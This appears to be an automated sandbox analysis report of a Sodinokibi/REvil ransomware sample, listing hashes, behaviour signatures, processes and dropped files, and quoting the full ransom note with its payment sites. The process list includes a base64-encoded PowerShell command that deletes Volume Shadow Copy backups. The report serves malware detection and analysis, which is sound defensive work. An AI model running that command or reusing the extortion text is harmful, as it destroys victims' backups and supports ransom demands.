Analysis

  • max time kernel
    149s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06-09-2024 09:21

General

  • Target

    cf36089d8aada316b4188e74ae11dc58_JaffaCakes118.exe

  • Size

    164KB

  • MD5

    cf36089d8aada316b4188e74ae11dc58

  • SHA1

    89270cd7f54b8d386b2a952ff71a934588035da7

  • SHA256

    a27a783e16fda91874b4885fd874c0018b82dec16061d15d8c701b61541d9d86

  • SHA512

    ac6ac6a919cd18b4d0fa7af95b69d180bef5b5aba65a93752bf637465082c00bf74239c5aa41396ed6df2a0a6215ba86d71e1bacd5a05dbd1c89b9a7f458a9c3

  • SSDEEP

    1536:FYVLroT4ciMeW75jVZF+pWGRjICS4At+GbvF0qcX8opz25maL3SUtNDWyPwop6iM:FHixaVZFiOCDJtOicNDWEzZDVrNgB

Malware Config

Extracted

Path

C:\Recovery\how to decrypt dvv0752-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your computer has extension dvv0752. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/7B9E55AC1E1CD171 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/7B9E55AC1E1CD171 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: cL9fNlkgvnN/1n65df7bh5Nz+YWTk9SzMBVRxkX5GXWARIdxMHirPI81/R2mnyU5 txf5KEY+RGuJS2+dYBXgGa72QNKs8wkQbu1rl9r5lMbfvrD8pM1w5lQC1Q3/bJIU rd3Vzc9VuePhXU6qisUDLRYTSoZiYyRPEx0AJrHF0TApqwNnLlOZu1G+cCSqocBM pjAWLuo7FHvNKGSaILjIbMBaI6CdYxdu8gRGbcKa6VfQTWhTPA75uHN5vpL0qt3w d2B2hKQ7NfyfjiZDVFyjb3FPgblv+7PLvJGuTOae8apZn3+2FWkcg0dAXBQBsJrf PklgByrLdK/VdLq9CUAAdyGwR8MCcq1rElPeK3sQkWdzMVSml3WD2SaOezSEaKPh W0cgdDUUjR2s2xIV/5bOBtbc09TGR29+dZmPwmsopx7P3yKsHcU8wzLRThCi15nW xLT9I6xxtPW1f4rcUI9UFancTEhT59+J/Dzm5TfuymWcTTbDPDuTmeAEnlgaYsfY mCXeIl9p5eH/NffMbSB31OT9amAew2F6By1/Ew0XoNCXLP8pN/csBEcjIKOorues vJRolUXdNAfb8mAYaxqPRgovyoPG9uHYH+yc9ql+MVGTvaAPQVBSVZCkCIPBJcTo di81nWjzlFqd+tVCpjmJF1cCDVvJvrZ2JyYED92c/cEv+8Ltpx2grf7tuSc6dlno FnQf3aklwFYrNKv9rpNNbWIyMpYSpej0QQSZTUMsxcTN1XPRV64pbefVoc2PadPU +3W3+YjCWWL6BNNuw+XDdObeNQGG49JcHyYFEHggOvr9i4HLVIq/1i7dax6KfoxA 5axEAHzO58t0EpMtHtHud74tDua9NOtO76/KGyWTabt5pDowSKnMMFFJuRdiZI/X /WyiSUMcLT9afrWtzMHmoMnxzQbZhyC7pLGTzG2caPVXX+PiXaf11K9goNY5R3ph h0dW6QwJ80MQmdRTkHTZuPFTT5vMR7gOEhc9jYH0NPlsYscudsEiYuBS+yAjRYJU A9EzKJP7JWfSGYFlF/tpA99uF4LUr6Z3KD9GzV+XE9ssXbJQRvDnAfcbOoREJhbV u7Q/VLfhvP1kzuTKVAdNAOE+/zw3BtGy8pzMLuL+bScNJLsjM5XT4ujUXpBpW5Ji s2gv/aoCYy3ids8W2Kpc9PqxsszFpEAjv+qvZi8/WCFV8ljaCEjO6HJj0s2d2FIp DnmDDBuIoXm8pQ0ZqePsrcCQjFI= Extension name: dvv0752 ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/7B9E55AC1E1CD171

http://decryptor.top/7B9E55AC1E1CD171

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Credentials from Password Stores: Windows Credential Manager 1 TTPs

    Suspicious access to Credentials History.

  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 26 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\cf36089d8aada316b4188e74ae11dc58_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\cf36089d8aada316b4188e74ae11dc58_JaffaCakes118.exe"
    1⤵
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:572
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4128
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:4812
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1400

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Recovery\how to decrypt dvv0752-readme.txt

      Filesize

      6KB

      MD5

      77c01b4642c32be60f1a234db348ed25

      SHA1

      4dc83b0a0b06916d94c43d2f5dbf63c57a8044a0

      SHA256

      ee2e7bc119c27eb9a7fbecd36cc52c357ab6f4b16948a7edbc75f81baecfb490

      SHA512

      65e8a2eb9ca691d5812d46dddd9adf1d7ca4cb349ee0853dff9c83d588719eb3537ba344921baa5aa421b088740bdb0d2635ff03ffa1ca28f6bf8dc6acaa1a70

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gqs0jgzd.ghs.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/4128-0-0x00007FFA2F083000-0x00007FFA2F085000-memory.dmp

      Filesize

      8KB

    • memory/4128-10-0x000001B872220000-0x000001B872242000-memory.dmp

      Filesize

      136KB

    • memory/4128-11-0x00007FFA2F080000-0x00007FFA2FB41000-memory.dmp

      Filesize

      10.8MB

    • memory/4128-12-0x00007FFA2F080000-0x00007FFA2FB41000-memory.dmp

      Filesize

      10.8MB

    • memory/4128-15-0x00007FFA2F080000-0x00007FFA2FB41000-memory.dmp

      Filesize

      10.8MB